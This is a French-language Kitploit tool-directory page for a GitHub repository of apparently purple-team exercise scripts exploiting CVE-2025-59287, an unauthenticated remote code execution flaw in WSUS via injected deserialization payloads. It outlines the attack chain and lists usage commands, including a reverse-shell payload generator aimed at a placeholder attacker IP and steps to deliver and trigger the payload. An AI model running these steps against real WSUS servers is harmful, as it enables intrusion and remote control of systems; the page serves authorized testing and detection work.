Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/swoon69/cve-2025-59287-exercise-use
Analyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationRed TeamingDéveloppement de Charges UtilesLabs et Pratique
GitHubswoon69/cve-2025-59287-exercise-use

CVE-2025-59287-Exercise-Use

Exercices d’équipe violette démontrant CVE-2025-59287, une RCE non authentifiée dans WSUS via l’injection de payloads de désérialisation malveillants dans la base de données WSUS.

Voir le dépôt
2il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-59287 — RCE non authentifiée sur WSUS

Scripts d'exercices Purple team pour CVE-2025-59287, une vulnérabilité d'exécution de code à distance non authentifiée dans Windows Server Update Services (WSUS).

Utilisation autorisée uniquement. Pour utilisation dans des environnements d'exercice contrôlés contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test.

Comment ça marche

La vulnérabilité abuse des points de terminaison SOAP WSUS accessibles anonymement pour injecter une charge utile de désérialisation malveillante dans la base de données WSUS. La charge utile s'exécute lorsque la console d'administration WSUS est ouverte ou qu'une synchronisation est déclenchée.

  1. Le service d'authentification WSUS émet un jeton valide à tout client anonyme
  2. Le jeton est échangé contre un cookie de session de reporting via le service web client
  3. Un objet sérialisé malveillant est injecté dans la base de données WSUS via le service de reporting
  4. La charge utile s'exécute au chargement de la console WSUS ou lors d'un événement de synchronisation

Prérequis

  • Machine d'attaque Windows avec PowerShell 5.1+
  • Accès réseau au serveur WSUS sur le port 8530
  • ysoserial.net placé dans le dossier ysoserial\Release\ (voir Configuration)

Structure du dépôt

root@kitploit:~
wsus-cve-2025-59287/
├── 1-check.ps1       # Verify target is vulnerable
├── 2-generate.ps1    # Generate serialized payload blob
├── 3-deliver.ps1     # Deliver payload to WSUS server
├── 4-verify.ps1      # Verify execution and clean up
├── ysoserial/        # Place ysoserial.net release here (not committed)
│   └── Release/
│       └── ysoserial.exe
└── README.md

Configuration

Clonez ou téléchargez le dépôt. Ajoutez ysoserial.net pour que le chemin corresponde à ysoserial\Release\ysoserial.exe.

Téléchargez ysoserial.net depuis : https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 Cela déclenchera Windows Defender par défaut

Utilisation

Exécutez tous les scripts depuis la racine du dépôt.

1 — Vérification

root@kitploit:~
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"

2 — Génération

Dépôt de fichier (aucun listener requis, recommandé en premier) :

root@kitploit:~
.\2-generate.ps1 -Mode filedrop

Shell inverse :

root@kitploit:~
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444

3 — Livraison

root@kitploit:~
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"

4 — Déclenchement

Sur le serveur WSUS, ouvrez la console d'administration via Démarrer > Windows Server Update Services, ou déclenchez une synchronisation via PowerShell :

root@kitploit:~
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()

5 — Vérification et nettoyage

Vérifier l'exécution :

root@kitploit:~
.\4-verify.ps1

Vérifier et nettoyer tous les artefacts :

root@kitploit:~
.\4-verify.ps1 -Cleanup

Depuis la machine d'attaque via le partage admin :

root@kitploit:~
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup

Après le nettoyage, supprimez le poste d'exercice de la console WSUS sous Computers.

Opportunités de détection

Références

  • CVE-2025-59287 — Recherche originale : hawktrace.com\
  • ysoserial
  • NIST
  • .NET Exploit/Blob gen
  • tecxx
  • mrk336
Télécharger l’outil